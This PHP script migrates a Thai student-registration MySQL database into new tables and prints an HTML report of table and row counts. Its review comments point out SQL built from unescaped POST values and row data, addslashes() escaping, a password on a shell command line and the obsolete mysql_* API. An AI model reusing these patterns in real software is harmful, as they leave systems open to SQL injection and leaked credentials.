<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel="stylesheet" type="text/css" href="style.css" />
<?php
// special_field(), called while the per-row INSERT values are built further
// down, is expected to come from this include — confirm against that file.
include_once('special_fld.php');
// A migration run can take a long time; lift the request's execution limit.
set_time_limit(0);
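/**
 * Return every index of $arr whose value equals $v (compared with strcmp()).
 *
 * The previous version tested the bare constant `i` instead of `$i` in the
 * loop condition, so the loop never terminated, and the comparison itself was
 * commented out, leaving the returned $rt undefined. The debug echo is gone.
 *
 * @param array  $arr list of strings to scan
 * @param string $v   value to look for
 * @return array list of matching indices, empty when nothing matches
 */
function findIndex($arr, $v){
	$rt = array();
	$sf = count($arr);
	for($i=0; $i<$sf; $i++){
		if(strcmp($arr[$i], $v)==0){
			$rt[] = $i;
		}
	}
	return $rt;
}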

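$ts=microtime(true); 
/*
if(empty($_GET))
    echo "No GET variables";
else
    print_r($_GET); 
*/
    // Every migration parameter comes straight from the POST body and is
    // untrusted: the names are later interpolated into SQL as identifiers and,
    // for dbNo==2, into a shell command (which escapes them). Absent keys are
    // read as '' so a missing field no longer raises an undefined-index notice.
    $dbreg = isset($_POST["dbreg"]) ? $_POST["dbreg"] : '';
    $dbmoreg = isset($_POST["dbmoreg"]) ? $_POST["dbmoreg"] : '';
    $dbppc = isset($_POST["dbppc"]) ? $_POST["dbppc"] : '';

    $localhost_s = isset($_POST["localhost_s"]) ? $_POST["localhost_s"] : '';
    $localhost_u = isset($_POST["localhost_u"]) ? $_POST["localhost_u"] : '';
    $localhost_p = isset($_POST["localhost_p"]) ? $_POST["localhost_p"] : '';
    $dbNo = isset($_POST["dbNo"]) ? $_POST["dbNo"] : '';
    $path_mysql = isset($_POST["path_mysql"]) ? $_POST["path_mysql"] : '';

    // Select the source ($oDB) / target ($moDB) databases and pull in the
    // matching mapping file, which is expected to define the $sm array used
    // by the rest of the script.
    if($dbNo==1) {
        $oDB = "regpbri";
        $moDB = $dbmoreg;
        include_once "arr_pbri.php";
    }elseif($dbNo==2) {
        $oDB = $dbreg;
        $moDB = $dbmoreg;
        //$path_mysql = '/opt/mysql/bin/mysql';//'mysql';
        include_once "arr_reg.php";

    }elseif($dbNo==3) {
        $oDB = $dbreg;
        $moDB = $dbppc;
        include_once "arr_people.php";
    }else{
        // Previously an unknown dbNo fell through with $oDB, $moDB and $sm
        // undefined and failed later at the database connection.
        die('unknown dbNo: ' . htmlspecialchars($dbNo, ENT_QUOTES));
    }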
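// ------------  connect 
// Three links to the same server (the second and third pass new_link=true so
// mysql_connect() does not hand back the first one):
//   $ln_info -> information_schema, used to count columns
//   $ln_reg  -> source database $oDB
//   $ln_mo   -> target database $moDB
// Credentials come from the POST body. On failure the driver message is
// echoed to the browser, as before; the server name shown is HTML-escaped
// because it is user-supplied. The original referenced the undefined
// $source_s/$local_s here and placed the closing tag after die(), where it
// never ran — die() is therefore spelled out as echo + exit.
$ln_info = mysql_connect($localhost_s, $localhost_u, $localhost_p);
if (!$ln_info) {
    echo "<font color='#FF0000'>" . htmlspecialchars($localhost_s, ENT_QUOTES);
    echo ' ไม่สามารถเชื่อมต่อฐานข้อมูลได้ ตรวจสอบชื่อ server, user และpassword ให้ถูกต้อง: ' . mysql_error();
    echo "</font >";
    exit;
}

$ln_reg = mysql_connect($localhost_s, $localhost_u, $localhost_p, true);
if (!$ln_reg) {
    echo "<font color='#FF0000'>" . htmlspecialchars($localhost_s, ENT_QUOTES);
    echo ' ไม่สามารถเชื่อมต่อฐานข้อมูลได้ ตรวจสอบชื่อ server, user และpassword ให้ถูกต้อง: ' . mysql_error();
    echo "</font >";
    exit;
}

$ln_mo = mysql_connect($localhost_s, $localhost_u, $localhost_p, true);
if (!$ln_mo) {
    echo "<font color='#FF0000'>" . htmlspecialchars($localhost_s, ENT_QUOTES);
    echo ' ไม่สามารถเชื่อมต่อฐานข้อมูลได้ ตรวจสอบชื่อ server, user และpassword ให้ถูกต้อง: ' . mysql_error();
    echo "</font >";
    exit;
}
// -------------- select DB
// mysql_error() is always given the link it belongs to: without an argument
// it reports the last-opened link ($ln_mo), which is not the one that failed
// for $ln_info/$ln_reg. Each select is also checked BEFORE the SET NAMES
// query on that link, since an intervening successful query would clear the
// error text the message is meant to show.

$db_info = mysql_select_db('information_schema', $ln_info);
//mysql_query("SET NAMES 'utf8'", $ln_info);
if (!$db_info) {
    die ('ไม่สามารถเชื่อมต่อฐานข้อมูล information_schema ได้: ' . mysql_error($ln_info));
}

$db_reg = mysql_select_db($oDB, $ln_reg);
if (!$db_reg) {
    die ("ไม่สามารถเชื่อมต่อฐานข้อมูล " . htmlspecialchars($oDB, ENT_QUOTES) . " ได้ โปรดตรวจสอบชื่อฐานข้อมูลอีกครั้ง : " . mysql_error($ln_reg));
}
mysql_query("SET NAMES 'utf8'", $ln_reg);
echo "เชื่อมต่อฐานข้อมูล " . htmlspecialchars($oDB, ENT_QUOTES) . " สำเร็จ<br>";

$db_mo = mysql_select_db($moDB, $ln_mo);
if (!$db_mo) {
    die ("ไม่สามารถเชื่อมต่อฐานข้อมูล " . htmlspecialchars($moDB, ENT_QUOTES) . " ได้ โปรดตรวจสอบชื่อฐานข้อมูลอีกครั้ง: " . mysql_error($ln_mo));
}
mysql_query("SET NAMES utf8", $ln_mo); 
mysql_query("SET collation_connection = 'utf8_general_ci' ", $ln_mo);
echo "เชื่อมต่อ " . htmlspecialchars($moDB, ENT_QUOTES) . " สำเร็จ<br><br>"; 
// --------------end select DB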

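    if($dbNo==2) {
        // Two tables are copied with the mysql command-line client instead of
        // through the PHP link. Every piece of the command is POST-derived, so
        // each one goes through escapeshellarg() before it reaches the shell;
        // the original interpolated them raw, which let a crafted value run
        // arbitrary commands as the web-server user. The password is still an
        // argument of the client process and so visible in the process list
        // while it runs. escapeshellarg() is locale-dependent and may drop
        // non-ASCII bytes; these values are expected to be plain ASCII.
        $mysql_args = escapeshellarg($path_mysql)
            . ' -h ' . escapeshellarg($localhost_s)
            . ' -u ' . escapeshellarg($localhost_u)
            . ' ' . escapeshellarg('-p' . $localhost_p);
        foreach (array('rg_RealStudentAd', 'rg_RealStudentDe') as $copy_tb) {
            // The database names are SQL identifiers and are not quoted, as
            // before; they are only shell-escaped here.
            $copy_sql = "DROP TABLE $dbmoreg.`$copy_tb` ; CREATE TABLE $dbmoreg.`$copy_tb` AS SELECT * FROM $dbreg.`$copy_tb`; ";
            $copy_cmd = $mysql_args . ' -e ' . escapeshellarg($copy_sql);
            system($copy_cmd, $retval);
            if($retval){
                // Only the SQL is echoed on failure: the original echoed the
                // whole command, credentials included, to the browser.
                echo "<font color='#FF0000'>ย้ายข้อมูล `$copy_tb` เกิดข้อผิดพลาด";
                echo $retval.' <br>sql : '.htmlspecialchars($copy_sql, ENT_QUOTES);
                echo "</font><br>";
            }
        }
        unset($mysql_args, $copy_sql, $copy_cmd);

// --   collapse runs of spaces in the parent/father/mother names to one space
        $mo_name = "UPDATE $dbreg.`StudentBio` SET parentName = REPLACE(REPLACE(REPLACE(parentName ,'นาย','นาย '),'นาง','นาง '),'นางสาว','นางสาว ') ,parentName = REPLACE(REPLACE(REPLACE(parentName ,SPACE(4),SPACE(1)) ,SPACE(3),SPACE(1)),SPACE(2),SPACE(1)) ,parentName = TRIM(parentName) ,fatherName = REPLACE(REPLACE(REPLACE(fatherName ,SPACE(4),SPACE(1)) ,SPACE(3),SPACE(1)),SPACE(2),SPACE(1)) ,fatherName = REPLACE(REPLACE(REPLACE(fatherName ,'นาย ','นาย'),'นาง ','นาง'),'นางสาว ','นางสาว') ,fatherName = TRIM(fatherName) ,motherName = REPLACE(REPLACE(REPLACE(motherName ,SPACE(4),SPACE(1)) ,SPACE(3),SPACE(1)),SPACE(2),SPACE(1)) ,motherName = REPLACE(REPLACE(REPLACE(motherName ,'นาย ','นาย'),'นาง ','นาง'),'นางสาว ','นางสาว') ,motherName = TRIM(motherName)";
        $rs = mysql_query($mo_name, $ln_reg);
        if (!$rs) {
            // The error text belongs to $ln_reg (without a link argument
            // mysql_error() reports the last-opened link), and the query
            // shown is $mo_name — the original printed the undefined
            // $import_query.
            $message  = 'Invalid query: ' . mysql_error($ln_reg) . "\n";
            $message .= 'Whole query: ' . $mo_name;
            die($message);
        }
    }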

//echo '+++++++++++++++++++++++++++++++++++++<br><br>';
// $sm is the table-mapping list provided by the arr_*.php include chosen above.
$sizeoftb = count($sm);
echo $sizeoftb . 'ตาราง <br>';

// Running totals for the footer row: source rows read and target rows written.
$records = 0;
$affected_records = 0;
?>
<table class='tb_1' width='100%' >
<tr align='center'>
    <th width=20 rowspan='2'></th>
    <th colspan='4'>ฐานข้อมูล <? echo $oDB;?></th>
    <th colspan='4'>ฐานข้อมูล <? echo $moDB;?></th>
    <th rowspan='2'>ฟิลด์ที่<br />เปลี่ยนแปลง</th>
</tr>
<tr align='center'>
    <td class='h2'>ชื่อตาราง</td>
    <td class='h2'>จำนวนฟิลด์<br />ที่พบ</td>
    <td class='h2'>จำนวนฟิลด์ที่<br />คัดลอกข้อมูล</td>
    <td class='h2'>จำนวน<br />แถวข้อมูล</td>
    <td class='h2'>ตาราง<br /><? echo $moDB;?></td>
    <td class='h2'>จำนวนฟิลด์<br />ที่พบ</td>
    <td class='h2'>จำนวนฟิลด์<br />ที่จัดเก็บข้อมูล</td>
    <td class='h2'>จำนวน<br />แถวข้อมูล</td>
</tr>

<?

// Main migration loop: one iteration per entry of the $sm mapping array
// (provided by the arr_*.php include chosen from $dbNo). Each entry names a
// source table ($sm[..]['old']) and a target table ($sm[..]['new']); the
// source rows are copied into the target with a generated INSERT and one
// HTML row summarising the copy is printed per table. Keys of $sm[$tb_num]
// read below: old/new (name, fld), plus, minus, def, ref, sql, qry.
for($tb_num=0; $tb_num < $sizeoftb; $tb_num++){

	$otb_name = $sm[$tb_num]['old']['name'];
	$motb_name = $sm[$tb_num]['new']['name'];

	// A source name of '-' means the target table has no source; only the
	// else-branch at the bottom (count target rows) runs for it.
	if($otb_name!='-'){
		
	// count the fields of both tables from information_schema
	// NOTE(review): $oDB (POST-derived) and the table names (from the mapping
	// file) are interpolated into these queries unescaped. The LIKE patterns
	// carry no wildcards, so on ordinary names they behave as equality.
	    $oQuery = "SELECT  *  FROM  `COLUMNS`  WHERE  `TABLE_SCHEMA`  LIKE  '".$oDB."'  AND `TABLE_NAME`  LIKE  '".$otb_name."'";

		$moQuery = "SELECT * FROM `COLUMNS` WHERE `TABLE_SCHEMA` LIKE '$moDB' AND `TABLE_NAME` LIKE '".$motb_name."'";

		$oRS = mysql_query($oQuery, $ln_info);
		if (!$oRS) {
			// mysql_error() without a link argument reports the last-opened
			// link ($ln_mo), not $ln_info — the text shown may be misleading.
			$message  = 'Invalid query: ' . mysql_error() . "\n";
			$message .= 'Whole query: ' . $oQuery;
			die($message);
		}
		$oFld_num = mysql_num_rows($oRS);

		$moRS = mysql_query($moQuery, $ln_info);
		if (!$moRS) {
			$message  = 'Invalid query: ' . mysql_error() . "\n";
			$message .= 'Whole query: ' . $moQuery;
			die($message);
		}
		$moFld_num = mysql_num_rows($moRS);
		
	// difference between the two field lists
		// 'plus'  : positions present only in the source mapping
		// 'minus' : positions present only in the target mapping
		$plus = sizeof($sm[$tb_num]['plus']);
		$minus = sizeof($sm[$tb_num]['minus']);

		// number of fields actually copied on each side
		$oFld_numA = sizeof($sm[$tb_num]['old']['fld']) - $plus;
		$moFld_numA = sizeof($sm[$tb_num]['new']['fld']) - $minus ;

		// text for the "changed fields" column of the report row
		$Fld_diff = '';
		if( $plus != 0 ){
			$Fld_diff .= "+ $plus<br>";
		}
		if( $minus != 0 ){
			$Fld_diff .= "  - $minus";
			//$rt = findIndex($sm[$tb_num]['new']['fld'], '-');
		}
?>

<?
		$num_row=-1;

		// Always-true leftover of an earlier "$plus == 0" condition: the copy
		// now runs for every table that has a source.
		if(1){//($plus == 0){
			// normal
		
			$query = "SELECT * FROM `$otb_name` WHERE 1;";

//			echo $query.'<br>';

			// NOTE(review): $result is not checked; if the SELECT fails,
			// mysql_num_rows(false) only emits a warning and $num_row is null,
			// which the ==0 test below treats as "no rows".
			$result = mysql_query($query, $ln_reg);
			$num_row = mysql_num_rows($result);
			$message = "";
            $affected = 0;
			if ($num_row==0) {
				//	$message  = 'Invalid query: ' . mysql_error() . "\n";
				//	$message = 'Whole query: ' . $query;

				//	echo "<td>$message</td>";
				$num_row=0;
				//	die($message);
                $num=1;
			}else{
			// Insert to
				// Build the two parallel column lists: target columns (new)
				// and the source columns they are filled from (old), skipping
				// the positions listed in 'minus'. in_array() is loose here.
				$nFld_name = "";
				$oFld_name = "";
                $fld_num = 0;
                for($nfld=0; $nfld<sizeof($sm[$tb_num]['new']['fld']); $nfld++){
                    if(!in_array($nfld,$sm[$tb_num]['minus'])){
                        $fld_num++;
                        $nFld_name .= '`'.$sm[$tb_num]['new']['fld'][$nfld].'`';
                        $oFld_name .= '`'.$sm[$tb_num]['old']['fld'][$nfld].'`';
                        if( $fld_num < $moFld_numA ){
                            $nFld_name .= ', ';
                            $oFld_name .= ', ';
                        }
                    }
                }


            // How the INSERT statement is produced:
            //   'sql' == '-' : INSERT ... SELECT straight from the source table
            //   'qry' set    : INSERT ... followed by the custom SELECT from the mapping
            //   otherwise    : one multi-row INSERT built value by value below
            if($sm[$tb_num]['sql']=='-'){
                $import_query = 'INSERT INTO `'.$moDB.'`.`'.$motb_name.'` ('.$nFld_name.') ';
                $import_query.= 'SELECT '.$oFld_name.' FROM `'.$oDB.'`.`'.$otb_name.'`;';
            }elseif(isset($sm[$tb_num]['qry'])){
                $import_query = 'INSERT INTO `'.$moDB.'`.`'.$motb_name.'` ('.$nFld_name.') ';
                $import_query.= $sm[$tb_num]['qry'];
                //echo "<font size='1'>".$import_query."</font><br>";
            }else{
                // NOTE(review): $import_query is not reset here. If every row
                // of this table is skipped by the rg_Adviser filter below, it
                // still holds the previous table's statement, and that is
                // what the mysql_query() after the loop executes again.
                $num=1;
                while ($row = mysql_fetch_assoc($result)) {
                    $getdata=true;
    // special case: skip this row when StudentMaster.officerId1 is NULL
    if($motb_name == 'rg_Adviser'){ // sm.officerId1 = NULL
        if($row['officerId1'] == ''){
            $getdata=false;
        }
    }
                if($getdata){
//if($otb_name == 'ProgramConfig') echo $row['programConfId'].'<br>';
                    // could add TRUNCATE TABLE $motb_name to clear the table's data without dropping its structure
                    // first row opens the VALUES list; later rows are appended with ','
                    if($num==1){
                        $import_query = 'INSERT INTO `'.$motb_name.'` ('.$nFld_name.') VALUES ';
                    //}elseif($num==100){
                    //    $import_query.= '; INSERT INTO `'.$motb_name.'` ('.$nFld_name.') VALUES ';
                    //    $num=2;
                    }else{
                        $import_query .= ',';
                    }
                    $import_query .= '(';
                    $fld_num = 0;
                    // one SQL value per target field, in 'new' order, skipping 'minus'
                    for($i=0;$i<sizeof($sm[$tb_num]['new']['fld']);$i++){
                        
                        if(!in_array($i,$sm[$tb_num]['minus'])){
                        $fld_num++;
                        // source column name for this position ('-' = none)
                        $fld_name = $sm[$tb_num]['old']['fld'][$i];
                        // 'def' rule handed to special_field() ('-' = none);
                        // special_field() comes from special_fld.php and its
                        // contract is not visible here — it is assumed to
                        // return the SQL value text to append.
                        $def_cond = $sm[$tb_num]['def']['fld'][$i];

//if($fld_name=='fatherName')
//{ echo " :$otb_name.$fld_name:$def_cond <br><br>"; }

                            // where the new field is looked up from
                            // the first source column is used as the row key
                            $fld_name_pk = $sm[$tb_num]['old']['fld'][0];
                            $ref = $sm[$tb_num]['ref']['fld'][$i];
                            if($ref != '-'){
                                // bracket-style delimiters: the pattern is a literal '-',
                                // so 'ref' is "table-pk-field"
                                list($ref_tb,$ref_pk,$ref_fld) = preg_split("[-]",$ref);
                                // NOTE(review): $row[$ref_pk] / $row[$fld_name_pk] are
                                // spliced into the WHERE clause unquoted and unescaped:
                                // a key containing quotes or spaces breaks the query,
                                // and source data that is not trusted could inject SQL.
                                if($ref_tb!=$otb_name){
                                    $qref = "SELECT $ref_fld FROM `$otb_name` JOIN `$ref_tb` ON $otb_name.$ref_pk = $ref_tb.$ref_pk 
                                WHERE $otb_name.$ref_pk = $row[$ref_pk]  ;";
                                }else{
                                    $qref = "SELECT $ref_fld FROM `$ref_tb`  
                                WHERE $ref_pk = $row[$fld_name_pk]  ;";
                                }
                                //echo "<td>$ref_tb</td>";
                                // $rsRef is not checked before mysql_num_rows()
                                $rsRef = mysql_query($qref, $ln_reg);
                                if(mysql_num_rows($rsRef)>0){
                                    $rref = mysql_fetch_assoc($rsRef);
                                    if($rref[$ref_fld]!='') {
//if($fld_name=='fatherName')
//{ echo $rref[$ref_fld]." :$otb_name.$fld_name:$def_cond <br><br>"; }
                                        // the lookup returned a value
                                        if($def_cond!='-'){
                                            //strip the surname in studentBio
                                            $import_query .= special_field($row,$ln_reg, $def_cond,$rref[$ref_fld]);
                                        }else{
                                            // NOTE(review): the is_null branch yields the
                                            // string literal 'NULL' once quoted on the next
                                            // line, not SQL NULL (unlike the default branch
                                            // further down). addslashes() is also not
                                            // charset-aware; mysql_real_escape_string() on
                                            // $ln_reg is the escaping the driver expects.
                                            $data = (is_null($rref[$ref_fld]))?'NULL':$rref[$ref_fld];
                                            $import_query .= "'".addslashes($data)."'";
                                            //$import_query .= "'".addslashes($rref[$ref_fld])."'";
                                        }
                                    }elseif($def_cond!='-'){
                                            $import_query .= special_field($row,$ln_reg, $def_cond);
                                    }else{
                                        $import_query .= "''";
                                    }
                                }else{
//echo " fld_name :$fld_name ,ref : $ref ,def_cond : $def_cond<br>";
                                    // lookup found nothing: fall back to the source column
                                    $rref=($fld_name!='-')?$row[$fld_name]:'';
                                    if($def_cond!='-'){
                                        $import_query .= special_field($row,$ln_reg, $def_cond,$rref);
                                    }else{
                                        $import_query .= "''";
                                    }
                                }
//echo "$def_p ,".addslashes($row[$def_fld]).'<br>';
                                //}
                            }else{
                                // find the default value
                                $rref=($fld_name!='-')?$row[$fld_name]:'';
                                if($def_cond!='-'){
//echo " fld_name :$fld_name ,ref : $ref ,def_cond : $def_cond<br>";
                                        $import_query .= special_field($row,$ln_reg, $def_cond,$rref);
//                                        if($def_cond=='default/1/'){ echo $import_query.'<br>';}
                                }else{
                                    //$import_query .= "''";
                                    // new field, original data: bare NULL or an
                                    // addslashes()-quoted string (see note above)
                                    $data = (is_null($row[$fld_name]))?'NULL':"'".addslashes($row[$fld_name])."'";
                                    $import_query .= $data;
                                }
                            }
                        
                        if( $fld_num < $moFld_numA )
                            $import_query .= ', ';
                        }
                    }//END for

                    $import_query .= ')';

                    $num++;
                    }  // getdata
                }   //while
            } //else isset sql
//echo $import_query.'<br><br>';

                    // run the INSERT against the target table

                //if($num_row>1){
                
                    // mysql_error()/mysql_affected_rows() are called without a
                    // link and so refer to the last-opened link, which is
                    // $ln_mo here — correct only by coincidence.
                    $rs = mysql_query($import_query, $ln_mo);
                    if (!$rs) {
                        $message  = 'Invalid query: ' . mysql_error() . "\n";
                        $message .= 'Whole query: ' . $import_query;
                        die($message);
                    }else{
                        $affected = mysql_affected_rows();
                    }
                 

            } // end !$result

        } //$plus + $minus
?>
        <tr>
            <td><?=$tb_num+1?></td>
            <td><?=$otb_name?></td>
            <td><?=$oFld_num?></td>
            <td><?=$oFld_numA?></td>
            <td><?=$num_row;?></td>

            <td><?=$motb_name?></td>
            <td><?=$moFld_num?></td>
            <td><?=$moFld_numA?></td>
            <td><?=$affected;?></td>
			<td><?=$Fld_diff;?></td>

			<td><?=$message;?></td>
		</tr>
<?
			// totals for the footer row
			$records+=$num_row;
            $affected_records+=$affected;
	}else{ 

        // target-only table: report its field count and current row count
        $moQuery = "SELECT * FROM `COLUMNS` WHERE `TABLE_SCHEMA` LIKE '$moDB' AND `TABLE_NAME` LIKE '".$motb_name."'";

        $moRS = mysql_query($moQuery, $ln_info);
        if (!$moRS) {
            $message  = 'Invalid query: ' . mysql_error() . "\n";
            $message .= 'Whole query: ' . $moQuery;
            die($message);
        }
        $moFld_num = mysql_num_rows($moRS);

        // full table scan just to count rows; SELECT COUNT(*) would do
        $moQuery = "SELECT * FROM `$motb_name`";

        $moRS = mysql_query($moQuery, $ln_mo);
        if (!$moRS) {
            $message  = 'Invalid query: ' . mysql_error() . "\n";
            $message .= 'Whole query: ' . $moQuery;
            die($message);
        }
        $affected = mysql_num_rows($moRS);


?>
		<tr><td><?=$tb_num+1?></td>
			<td><?=$otb_name?> </td>
            <td>-</td>
            <td>-</td>
            <td>-</td>
			<td><?=$motb_name?></td>
            <td><?=$moFld_num?></td>
            <td>-</td>
            <td><?=$affected?></td>
			<td>-</td>
		</tr>
<?
	}// END if != '-'
} // END for $tb_num


$te = microtime(true);
// Elapsed time in minutes; only shown by the commented-out echo below.
$tt = ($te - $ts) / 60;

// Footer row: total source rows read and total target rows written.
echo '<tr><td colspan=4></td><td >' . $records . '</td>';
echo '<td colspan=3></td><td >' . $affected_records . '</td><td ></td></tr>';
//echo "<td colspan=4>เวลา :  $tt</td></tr>";

// Release the three links opened at the top of the script.
foreach (array($ln_info, $ln_reg, $ln_mo) as $link) {
    mysql_close($link);
}

// Put the execution-time limit back to its default now the run is over.
set_time_limit(30);
?>
</table>
